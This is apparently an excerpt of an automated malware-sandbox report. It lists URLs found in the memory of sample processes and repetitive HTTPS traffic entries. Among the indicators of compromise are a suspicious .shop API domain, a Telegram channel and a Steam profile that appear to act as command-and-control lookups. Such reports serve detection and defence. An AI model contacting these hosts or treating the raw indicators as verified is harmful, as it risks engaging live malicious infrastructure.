Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/c
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/m
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899$
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899tS
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: F441.exe, 00000006.00000003.2060569884.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: 9EDA.exe, 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop//E
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/B9E
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/aFX
Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/l
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1697094973.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/IDGDGCGHCG
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 52653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52679
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52671
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52675
Source: unknown	Network traffic detected: HTTP traffic on port 52662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52680
Source: unknown	Network traffic detected: HTTP traffic on port 52685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52681
Source: unknown	Network traffic detected: HTTP traffic on port 52692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52687
Source: unknown	Network traffic detected: HTTP traffic on port 52661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52692
Source: unknown	Network traffic detected: HTTP traffic on port 52665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52690
Source: unknown	Network traffic detected: HTTP traffic on port 52669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52659
Source: unknown	Network traffic detected: HTTP traffic on port 52680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52653
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52668 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52668
